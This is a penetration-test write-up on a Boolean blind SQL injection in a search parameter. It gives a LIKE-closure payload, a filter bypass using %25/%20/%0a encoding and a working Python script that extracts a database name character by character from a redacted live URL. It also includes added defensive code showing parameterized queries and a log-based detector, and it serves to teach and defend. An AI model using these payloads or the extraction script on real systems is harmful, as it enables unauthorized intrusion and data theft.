1. Identify the problem
During this test an injection point was found. The response body contained the SQL statement itself, which confirmed that the parameter was injectable, so this injection attempt began.
First of all, we can confirm that this is a GET request. I thought it was a simple error-based injection and that sqlmap could exploit the vulnerability directly, but reality gave me a slap in the face: sqlmap could not exploit this vulnerability at all. However, the database statement actually appeared in the returned packet, so I took the returned statement and started a small manual construction process.
The copied database statement:
SELECT count(0) FROM customer c WHERE c.dealership_id = ? AND c.active = true AND (c.full_name LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub1 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub2 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%')
2. Test statement
Experiments showed that the error content changed with the input, which confirms that the parameter really does reach the database statement. However, the statement has to be closed correctly and the returned content itself cannot be used to read data, so error-based injection can be ruled out. That leaves only two injection types that can be detected, time-based blind and Boolean-based blind, with the test statement appended directly after the target value.
Construct the database statement:
%'){Test statement}AND(c.full_name like'%test
The request returns successfully and the statement is closed (the closure also reuses the database's LIKE '%...%' fuzzy match). Further testing showed that there is input filtering: a bare % and a literal space are both rejected and the server returns 404. Encoding them as %25 and %20 bypasses the filter on the bare % and the space; with that, the statement above closes correctly, the server returns 200 with a normal response, and a Boolean blind injection test can be carried out based on whether the constructed statement is valid.
Next, confirm the test statement:
27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test
The database name is confirmed by extracting it one character at a time (substr at position {1}, compared by ASCII value {0}) and matching each character.
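The leaked statement in section 1 binds dealership_id with a ? placeholder but pastes the search word straight into the LIKE pattern, which is exactly why the closure in section 2 works: a quote and a parenthesis in the input end the pattern and everything after them becomes SQL. The following Python is an added example, not code from the original write-up or from the application it describes. It rebuilds the two query styles over a constructed in-memory SQLite table (the table, its rows and the dealership id 7 are assumptions) and shows that the concatenated form returns a different count for a true and a false injected condition, which is the signal a Boolean blind test relies on, while the bound form with escaped wildcards treats the same input as literal text.

```python
import sqlite3


def make_db():
    """Constructed sample table (not from the page), shaped like the customer
    table in the leaked query."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customer (dealership_id INTEGER, active INTEGER, "
        "full_name TEXT, phone_number TEXT)"
    )
    conn.executemany(
        "INSERT INTO customer VALUES (?, ?, ?, ?)",
        [
            (7, 1, "test 1", "555-0101"),
            (7, 1, "user 2", "555-0102"),
            (7, 0, "test 3", "555-0103"),  # inactive, never counted
            (8, 1, "test 1", "555-0104"),  # other dealership, never counted
        ],
    )
    return conn


def count_concatenated(conn, dealership_id, search_word):
    """Mirrors the page's query: dealership_id is bound with '?', but the
    search word is pasted into the LIKE pattern, so a quote and a parenthesis
    in it close the pattern and the rest is executed as SQL."""
    sql = (
        "SELECT count(0) FROM customer c WHERE c.dealership_id = ? "
        "AND c.active = 1 AND (c.full_name LIKE '%" + search_word + "%')"
    )
    return conn.execute(sql, (dealership_id,)).fetchone()[0]


def like_literal(text):
    """Escape LIKE metacharacters so user text is matched literally."""
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def count_parameterized(conn, dealership_id, search_word):
    """Hardened form: the whole pattern travels as a bound parameter and the
    user's own % and _ are escaped, so the input can never change the statement."""
    sql = (
        "SELECT count(0) FROM customer c WHERE c.dealership_id = ? "
        "AND c.active = 1 AND (c.full_name LIKE ? ESCAPE '\\')"
    )
    pattern = "%" + like_literal(search_word) + "%"
    return conn.execute(sql, (dealership_id, pattern)).fetchone()[0]


# Same closure shape as the page's test statement: close the LIKE, insert a
# condition, then reopen a LIKE so the original tail of the query still parses.
TRUE_PROBE = "1%') AND (1=1) AND (c.full_name LIKE '%test"
FALSE_PROBE = "1%') AND (1=2) AND (c.full_name LIKE '%test"


def compare(search_word, dealership_id=7):
    """Return (count from the concatenated query, count from the bound query)."""
    conn = make_db()
    return (
        count_concatenated(conn, dealership_id, search_word),
        count_parameterized(conn, dealership_id, search_word),
    )


if __name__ == "__main__":
    for word in ("1", "%", TRUE_PROBE, FALSE_PROBE):
        print(repr(word), "->", compare(word))
```

The concatenated builder answers (1, ...) for the true probe and (0, ...) for the false one, which is the one-bit oracle behind the character-by-character extraction in the next section; the bound builder returns 0 for both probes and also stops a bare % from matching every row.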
3. Tool ideas
3.1 Request packet utilization
Use Python to send the requests and batch-test the target.
Unlike time-based blind injection, Boolean blind injection has to be confirmed from differences in the returned response.
%0a(ascii(substr(database(),{1},1))={0})%0a
The find function looks for a characteristic string in the response to determine whether the injected condition held and the character was obtained.
# coding:utf-8
import requests

headers = {
    # Header information, add by yourself
}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.'  # candidate characters (not used by the loop below yet)
database = ''
for j in range(1, 11):          # {1}: position of the character in the database name
    for i in range(49, 125):    # {0}: candidate ASCII value for that position
        Url = 'https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test'
        UrlFormat = Url.format(i, j)  # format() fills in the ASCII value and the position
        r = requests.get(UrlFormat, headers=headers)
        d = r.text.find("Test")  # use find() to look for the characteristic string and decide whether the injected condition held
        if d != -1:
            print(i)
            print(chr(i))
            database += chr(i)
            print(database)
            break
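Seen from the defending side, the filter the page ran into (rejecting a bare % and a literal space in the raw query string) fails because it inspects the request before decoding it; the payload above passes only because %25, %20 and %0a are not what the filter matches. The following detector is an added example and not part of the original write-up. It canonicalizes the searchWord parameter (decode until the value stops changing, collapse every whitespace form to one space) before checking it for the constructs that appear in the page's payload, and then groups flagged requests per client, because a blind extraction like the script above shows up in an access log as a run of near-identical requests that differ only in the numbers. The /find path, the parameter names and the payload shape follow the page; the client addresses, the log format and the threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (not from the page). Format: client path status.
# The first lines are ordinary searches; the 10.0.0.9 lines have the shape of
# the requests the page's script sends (position and ASCII value vary).
SAMPLE_LOG = """\
10.0.0.5 /find?pageNo=1&pageSize=20&searchWord=1 200
10.0.0.5 /find?pageNo=1&pageSize=20&searchWord=smith 200
10.0.0.7 /find?pageNo=1&pageSize=20&searchWord=50%25 200
10.0.0.7 /find?pageNo=1&pageSize=20&searchWord=100% 404
10.0.0.9 /find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),1,1))=99)%0aAND(c.full_name%0alike%0a%27%25test 200
10.0.0.9 /find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),1,1))=100)%0aAND(c.full_name%0alike%0a%27%25test 200
10.0.0.9 /find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),2,1))=101)%0aAND(c.full_name%0alike%0a%27%25test 200
"""


def naive_filter_rejects(raw_value):
    """The filter described on the page: a bare % (one not followed by two hex
    digits) or a literal space in the *raw* value is rejected with 404.
    Percent-encoded forms are not what it matches, so they pass."""
    return re.search(r"%(?![0-9A-Fa-f]{2})| ", raw_value) is not None


def canonicalize(raw_value, max_rounds=5):
    """Decode until the value stops changing (bounded, so a malformed value
    cannot loop), then collapse newlines (the page's %0a), tabs and runs of
    spaces to a single space and lower-case the result."""
    value = raw_value
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).strip().lower()


# Only constructs that occur in the page's payload; a real deployment would
# carry a longer, maintained list.
SQLI_MARKERS = re.compile(r"'\)\s*and\b|\bascii\s*\(|\bsubstr\s*\(|\bdatabase\s*\(\s*\)")


def raw_params(path):
    """Split the query string without decoding it, so the naive filter sees
    exactly what the server saw."""
    out = {}
    for part in urlsplit(path).query.split("&"):
        if part:
            key, _, value = part.partition("=")
            out[key] = value
    return out


def inspect_request(path):
    """Return (naive filter rejects?, canonical check flags?, canonical value)
    for the searchWord parameter of one request path."""
    raw = raw_params(path).get("searchWord", "")
    canon = canonicalize(raw)
    return naive_filter_rejects(raw), SQLI_MARKERS.search(canon) is not None, canon


def detect_enumeration(log_text, threshold=3):
    """Per client, count requests whose canonical searchWord is flagged. A client
    with >= threshold flagged requests whose payloads differ only in digits is
    reported: that is what character-by-character blind extraction looks like."""
    hits = defaultdict(int)
    templates = defaultdict(set)
    for line in log_text.splitlines():
        client, path, _status = line.split()
        _, flagged, canon = inspect_request(path)
        if flagged:
            hits[client] += 1
            templates[client].add(re.sub(r"\d+", "N", canon))
    return {
        client: n
        for client, n in hits.items()
        if n >= threshold and len(templates[client]) == 1
    }


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        client, path, status = line.split()
        rejects, flagged, canon = inspect_request(path)
        print(f"{client} status={status} naive_rejects={rejects} flagged={flagged} canon={canon!r}")
    print("enumerating clients:", detect_enumeration(SAMPLE_LOG))
```

On the sample log the naive filter rejects only the request with a raw % (status 404) and lets all three encoded payloads through, while the canonical check flags exactly those three and the per-client grouping reports 10.0.0.9; the legitimately encoded 50%25 is neither rejected nor flagged.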
4. Future thoughts
Ideas for the future development of the code:
1. Add the ability to load a request packet directly
2. The value of {0} always has to be modified
3. Optimize threading
4. Write the code for the GET method
5. Refactor the overall code logic